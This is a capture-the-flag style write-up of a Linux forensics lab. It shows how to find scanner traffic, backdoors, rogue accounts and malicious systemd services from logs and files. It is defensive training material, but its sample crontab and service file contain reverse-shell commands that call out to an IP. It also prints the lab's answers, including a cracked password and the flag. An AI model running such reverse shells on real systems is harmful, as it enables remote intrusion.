Linux Forensics
Date: 04 June 2021
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
Apache Log Analysis 1
The most significant attack surface on the server is probably the web service.
Fortunately, the Apache access log keeps a history of all of the requests sent to the webserver and includes:
Source IP address
Response code & Length
User-Agent
User-Agent - We can also use this string to identify traffic from potentially malicious tools, since scanners like Nmap, SQLmap, DirBuster and Nikto leak their identities through their default user-agent strings.
How many different tools made requests to the server?
Answer: 2
curl and nmap
Name a path requested by Nmap.
Answer: /nmaplowercheck1618912425
Steps to Reproduce:
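One way to list the tools is to pull the user-agent field out of the access log. A sketch against invented log lines (the real log lives on the server, typically under /var/log/apache2/):

```shell
# Illustrative access-log lines; timestamps and sizes are invented for the sketch
cat > access.log <<'EOF'
10.0.2.15 - - [20/Apr/2021:13:30:15 +0000] "GET /nmaplowercheck1618912425 HTTP/1.1" 404 435 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.0.2.15 - - [20/Apr/2021:13:31:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "curl/7.68.0"
EOF

# The user-agent is the sixth double-quoted field; de-duplicate to count distinct tools
awk -F'"' '{print $6}' access.log | sort -u
```

The same de-duplicated list answers both questions: the tool names come from the user-agent strings, and the Nmap lines also carry the requested paths.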
Web Server Analysis
Web scanners are run against servers pretty much all the time, so this traffic is not out of the ordinary.
Have a look around the site for potential attack vectors.
What page allows users to upload files?
Answer: contact.php
Steps to Reproduce:
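File uploads arrive as POST requests, so listing the distinct POST targets points at the upload page. A sketch against an invented log line:

```shell
# Illustrative log lines; timestamps and sizes are invented for the sketch
cat > access.log <<'EOF'
192.168.56.24 - - [20/Apr/2021:14:02:11 +0000] "POST /contact.php HTTP/1.1" 200 311 "-" "Mozilla/5.0"
10.0.2.15 - - [20/Apr/2021:13:31:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "curl/7.68.0"
EOF

# The request target is the seventh whitespace-separated field of a POST line
grep '"POST ' access.log | awk '{print $7}' | sort -u
```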
What IP uploaded files to the server?
Answer: 192.168.56.24
Steps to Reproduce:
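The uploader's address is the first field of the same POST lines. A sketch with an invented log entry:

```shell
# Illustrative log line; timestamp and size are invented for the sketch
cat > access.log <<'EOF'
192.168.56.24 - - [20/Apr/2021:14:02:11 +0000] "POST /contact.php HTTP/1.1" 200 311 "-" "Mozilla/5.0"
EOF

# The source IP is the first field of each POST request
grep '"POST ' access.log | awk '{print $1}' | sort -u
```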
Who left an exposed security notice on the server?
Answer: Fred
Steps to Reproduce:
Filter out the noise from the log files:
Check the SECURITY.md file:
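Filtering out scanner traffic makes the interesting requests stand out. A sketch, assuming the noise comes from the Nmap and curl user-agents found earlier (log lines invented):

```shell
# Illustrative log lines; the second request is the kind of thing that surfaces
# once scanner noise is removed
cat > access.log <<'EOF'
10.0.2.15 - - [20/Apr/2021:13:30:20 +0000] "GET /admin HTTP/1.1" 404 435 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.20 - - [20/Apr/2021:14:10:05 +0000] "GET /SECURITY.md HTTP/1.1" 200 221 "-" "Mozilla/5.0"
EOF

# Drop requests made by the known scanning tools
grep -v -i -e 'nmap' -e 'curl' access.log
```

Reading the exposed SECURITY.md itself (e.g. with cat or curl against the server) then shows who signed the notice.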
Persistence Mechanism 1
There are multiple ways to maintain persistence in most Linux distributions including but not limited to:
cron
Services/systemd
bashrc
Kernel modules
SSH keys
What command and option did the attacker use to establish a backdoor?
Answer: sh -i
Steps to Reproduce:
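cron is a natural first place to look for the interactive-shell backdoor. A sketch with a hypothetical crontab entry (the IP, port and file name are invented; on the image you would grep /etc/crontab, /etc/cron.d/ and user crontabs):

```shell
# Hypothetical crontab; the second entry is an invented reverse-shell backdoor
cat > crontab.sample <<'EOF'
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root sh -c "sh -i >& /dev/tcp/192.168.56.24/4444 0>&1"
EOF

# Search for the interactive-shell flag used by the backdoor
grep -n 'sh -i' crontab.sample
```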
User Accounts
/etc/passwd - contains the names of most of the accounts on the system. It should have open read permissions and should not contain password hashes.
/etc/shadow - contains the account names along with their password hashes. It should have strict permissions.
What is the password of the second root account?
Answer: mrcake
Steps to Reproduce:
Check out both files:
If there is an x after the first colon in an /etc/passwd entry, the password hash is stored in the /etc/shadow file. For the root2 account, however, a password hash sits in the place of the x.
Cracking the hash:
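The odd entry can be spotted by checking the second field of each /etc/passwd line. A sketch with placeholder data (the hash below is fake, not the room's):

```shell
# Minimal /etc/passwd sketch; root2's hash is a placeholder, not the real one
cat > passwd.sample <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
root2:$6$fakesalt$fakehash:0:0::/root:/bin/bash
EOF

# Flag any account whose password field holds a hash instead of x, * or !
awk -F: '$2 != "x" && $2 != "*" && $2 != "!" {print $1}' passwd.sample
```

The lifted hash can then be passed to a cracker such as john or hashcat with a wordlist like rockyou.txt.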
Apache Log Analysis 2
There are a few other ways of identifying traffic originating from scanners.
The time between each request is a good metric for most tools.
Individual tools can be identified from signatures left in the requests; for example, Nmap will send HTTP requests with a random non-standard method when performing certain enumeration tasks.
More aggressive tools can also be identified simply from the number of requests sent during any given attack; directory brute-forcing tools are a perfect example of this and are likely to fall foul of banning systems like fail2ban.
Fail2ban is an intrusion-prevention framework, written in Python, that runs as a daemon on your server and protects it from brute-force attacks by dynamically blocking clients that repeatedly fail to authenticate with your services.
A poorly designed site may also freely give away valuable information without the need for aggressive tools. In this case, the site uses sequential IDs for all of its products, making it easy to scrape every single product or to find the total size of the product database by simply increasing the product ID until a 404 error occurs.
Name one of the non-standard HTTP Requests.
Answer:
Steps to Reproduce:
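Non-standard methods can be filtered out of the log by comparing each request's verb against the usual HTTP methods. A sketch against invented log lines (the random method string below is made up, not the room's answer):

```shell
# Illustrative log lines; XQJZTR stands in for whatever random method Nmap sent
cat > access.log <<'EOF'
10.0.2.15 - - [20/Apr/2021:13:30:15 +0000] "GET / HTTP/1.1" 200 1234 "-" "curl/7.68.0"
10.0.2.15 - - [20/Apr/2021:13:30:16 +0000] "XQJZTR / HTTP/1.1" 501 293 "-" "-"
EOF

# The method is the first word of the second double-quoted field;
# drop the standard verbs and whatever remains is scanner noise
awk -F'"' '{print $2}' access.log | awk '{print $1}' |
  grep -vE '^(GET|POST|HEAD|PUT|DELETE|OPTIONS|PATCH)$' | sort -u
```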
At what time was the Nmap scan performed? (format: HH:MM:SS)
Answer: 13:30:15
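The scan time can be lifted from the bracketed timestamp of the first Nmap request. A sketch with an invented log line carrying that timestamp:

```shell
# Illustrative Nmap request; date and sizes are invented for the sketch
cat > access.log <<'EOF'
10.0.2.15 - - [20/Apr/2021:13:30:15 +0000] "GET / HTTP/1.1" 404 435 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
EOF

# Grab the bracketed timestamp, then keep only the HH:MM:SS portion
grep -i nmap access.log | awk -F'[][]' '{print $2}' |
  cut -d: -f2-4 | cut -d' ' -f1 | head -n1
```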
Persistence Mechanism 2
SSH keys are another excellent way of maintaining access, so it might be worth looking for additions to the authorized_keys file.
What username and hostname combination can be found in one of the authorized_keys files? (format: username@hostname)
Answer: kali@kali
Steps to Reproduce:
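Every authorized_keys file on the image can be found and read in one pass; the trailing field of each key line is usually a user@host comment added by ssh-keygen. A sketch with fake key material (only the comment matters here):

```shell
# Fake key and directory layout for the sketch; on the image you would
# search from / (e.g. the users' home directories and /root)
mkdir -p evidence/root/.ssh
cat > evidence/root/.ssh/authorized_keys <<'EOF'
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAB...notarealkey... kali@kali
EOF

# Print the last field (the user@host comment) of every key found
find evidence -name authorized_keys -exec awk '{print $NF}' {} \;
```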
Program Execution History
Of course, adding a public key to root's authorized_keys requires root-level privileges, so it may be best to look for more evidence of privilege escalation.
In general, Linux stores a tiny amount of programme execution history when compared to Windows, but there are still a few valuable sources, including:
bash_history - Contains a history of commands run in bash; this file is well known, easy to edit and sometimes disabled by default.
auth.log - Contains a history of all commands run using sudo.
history.log (apt) - Contains a history of all tasks performed using apt; useful for tracking programme installations.
systemd services - Keep logs in the journald system. These logs are kept in a binary format and have to be read with a utility like journalctl. This binary format comes with some advantages: each journal is capable of validating itself and is harder to modify. To view:
journalctl /lib/systemd/systemd-journald
What is the first command present in root's bash_history file?
Answer: nano /etc/passwd
Steps to Reproduce:
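The first command is simply the first line of root's history file. A sketch against an invented sample (on the image the file is /root/.bash_history):

```shell
# Illustrative history file standing in for /root/.bash_history
cat > bash_history.sample <<'EOF'
nano /etc/passwd
cat /etc/shadow
EOF

# History files list commands oldest-first, so the first line is the first command
head -n 1 bash_history.sample
```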
Persistence Mechanism 3
Malware can also maintain persistence using systemd, as scripts run under systemd execute in the background and restart whenever the system boots or whenever the script crashes.
It is also relatively easy to conceal malicious scripts, as they can blend in with other services.
systemd services are defined in .service files, which can contain:
The command that runs whenever the service starts
The user the service runs as
An optional description
Running systemctl will list all of the services loaded into the system. It might be worth adding --type=service --state=active to the command, as it will reduce the list to services that are running. Once the name of a suspicious service is found, more information can be extracted by running:
systemctl status <service name>
Figure out what's going on and find the flag.
Answer: gh0st_1n_the_machine
Steps to Reproduce:
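Once a suspicious unit is found, its .service file tells you what runs and as whom. A sketch with a hypothetical unit file (the name, description, IP and port are all invented):

```shell
# Hypothetical malicious unit file; everything in it is invented for the sketch
cat > suspicious.service <<'EOF'
[Unit]
Description=Network Time Service

[Service]
ExecStart=/bin/sh -c "sh -i >& /dev/tcp/10.0.2.15/4444 0>&1"
User=root

[Install]
WantedBy=multi-user.target
EOF

# ExecStart reveals the command; User reveals the account it runs under
grep -E '^(ExecStart|User)=' suspicious.service
```

On a live system the same information comes from systemctl status on the service, or from reading its unit file under /etc/systemd/system/ or /lib/systemd/system/.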